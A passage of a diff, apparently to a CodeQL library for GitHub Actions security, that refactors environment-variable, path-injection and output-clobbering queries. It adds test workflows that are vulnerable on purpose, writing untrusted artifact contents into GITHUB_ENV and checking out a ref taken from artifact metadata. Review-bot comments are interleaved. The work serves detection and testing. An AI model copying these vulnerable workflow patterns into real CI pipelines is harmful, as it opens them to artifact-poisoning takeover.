implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) ) or exists(Uses step | 
@@ -104,8 +107,8 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dd6b8342185..214e97fed6b 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -28,15 +28,15 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubEnv(run, _) + run.getScript().fileToGitHubEnv(_) ) ) } @@ -52,9 +52,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) ) } } 
@@ -71,8 +70,8 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() and - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) + run.getScript() = this.asExpr() and + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) ) } } @@ -109,8 +108,12 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) ) or exists(Uses step | @@ -123,8 +126,8 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4f9eeef7579..e959c7d60ca 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
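Review bot: The `GITHUB_PATH` case is dropped from `EnvVarInjectionConfig::isAdditionalFlowStep` in hunk `@@ -109,8 +108,12 @@`. The removed call passed `["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"]`, while the new disjunction only covers `getAnEnvReachingGitHubEnvWrite` and `getAnEnvReachingGitHubOutputWrite`. The parallel step in EnvPathInjectionQuery.qll keeps all three. If the narrowing is intended, a comment such as `// GITHUB_PATH writes are handled by EnvPathInjectionQuery` would make that explicit. Otherwise add `or run.getScript().getAnEnvReachingGitHubPathWrite(var)` so the refactor stays behaviour-preserving.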
@@ -19,7 +19,7 @@ abstract class OutputClobberingSink extends DataFlow::Node { } */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, Step step | + exists(Run run, Step step, string field1, string field2 | ( step instanceof UntrustedArtifactDownloadStep or @@ -31,7 +31,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Uses uses | step = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or step instanceof GitMutableRefCheckout @@ -43,14 +44,28 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step instanceof GhSHACheckout ) and step.getAFollowingStep() = run and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled ( + // echo "sha=$(> $GITHUB_OUTPUT exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubOutput(run, _) + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" ) ) } 
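Review bot: In `OutputClobberingFromFileReadSink` (hunk `@@ -43,14 +44,28 @@`) the new variables `field1` and `field2` are bound but never related to each other, and `field2 = "UNKNOWN"` is a sentinel that nothing reads. The sibling `OutputClobberingFromEnvVarSink` ends with `not field2 = field1`, so the two sinks now disagree on whether the clobbered and clobbering fields must differ. If the same rule is meant here, add `not field2 = field1` after the attacker-controlled disjunction. If not, replace both variables with `_` and drop the sentinel so the predicate does not suggest a comparison that never happens. The comment `// echo "sha=$(> $GITHUB_OUTPUT` in the same hunk appears truncated on this page and should be checked against the file.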
@@ -66,16 +81,24 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var, string field | - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string field2 | - run.getAWriteToGitHubOutput(field2, _) and - not field2 = field + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() ) and - exists(run.getInScopeEnvVarExpr(var)) and - run.getScriptScalar() = this.asExpr() + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + not field2 = field1 ) } } 
@@ -97,13 +120,18 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { * echo $BODY */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string clobbering_line, string var_name | - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and - clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) ) } } @@ -133,30 +161,35 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { * echo "::set-output name=OUTPUT::SAFE" */ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + string clobbering_cmd; + WorkflowCommandClobberingFromFileReadSink() { - exists(Run run, string clobbering_line | - run.getScriptScalar() = this.asExpr() and - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and + exists(Run run, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and ( - // A file is read and its content is assigned to an env var that gets printed to stdout + // A file's content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT echo "OUTPUT_2=$(> $GITHUB_OUTPUT 
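Review bot: The echo pattern in `WorkflowCommandClobberingFromEnvVarSink` (hunk `@@ -97,13 +120,18 @@`) has no delimiter after the variable name. With `clobbering_var` bound to `BODY` it also matches a statement such as `echo $BODY_LEN`, which prints a different variable. The removed line had the same shape, so this is carried over rather than introduced, but it costs the query precision. Closing the name with a word boundary, `clobbering_var + "\\b.*"`, would keep both the `$VAR` and `${VAR}` forms and reject longer names. The two new class fields `clobbering_var` and `clobbered_value` also deserve a one-line QLDoc each, since no use of them is visible in this hunk.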
diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 00000000000..4241647d3e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml new file mode 100644 index 00000000000..0c205952102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml 
@@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 00000000000..71f590fbc9c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 00000000000..e4845a6f2f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 00000000000..67209267b5c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 00000000000..af9f01b572f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml 
@@ -0,0 +1,29 @@
+name: SnapshotPR
+on:
+ workflow_run:
+ workflows:
+ - ApprovalComment
+ types:
+ - completed
+jobs:
+ snapshot:
+ permissions:
+ id-token: write
+ pull-requests: write
+ statuses: write
+ if: github.event.workflow_run.conclusion == 'success'
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - uses: ./.github/actions/download-artifact
+ - id: metadata
+ run: |
+ pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)"
+ pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"
+ echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"
+ echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV"
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ env.PR_COMMIT }}
+ - uses: ./.github/actions/install-deps
+ - run: make snapshot
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml
new file mode 100644
index 00000000000..e35bc73c3bd
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml
@@ -0,0 +1,29 @@
+name: SnapshotPR
+on:
+ workflow_run:
+ workflows:
+ - ApprovalComment
+ types:
+ - completed
+jobs:
+ snapshot:
+ permissions:
+ id-token: write
+ pull-requests: write
+ statuses: write
+ if: github.event.workflow_run.conclusion == 'success'
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - uses: ./.github/actions/download-artifact-2
+ - id: metadata
+ run: |
+ pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)"
+ pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"
+ echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"
+ echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV"
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ env.PR_COMMIT }}
+ - uses: ./.github/actions/install-deps
+ - run: make snapshot
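Review bot: artifactpoisoning91.yml and artifactpoisoning92.yml are identical except for the local action they call (`download-artifact` versus `download-artifact-2`), and neither says what the second variant is meant to exercise. A one-line comment above each `uses: ./.github/actions/...` step naming the difference would help, e.g. `# variant 2: same flow, artifact fetched via download-artifact-2`. It is also worth recording in the fixture that the job holds `id-token: write` and later checks out `ref: ${{ env.PR_COMMIT }}`, a value read from the artifact's metadata.txt, before `make snapshot`; that is why the unvalidated `GITHUB_ENV` write matters here, and the ArtifactPoisoning expected file in this patch still lists artifactpoisoning92.yml:28:9:29:6.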
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index aff785242f9..220eaf33663 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | 
@@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| 
.github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -79,6 +94,11 @@ nodes | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable 
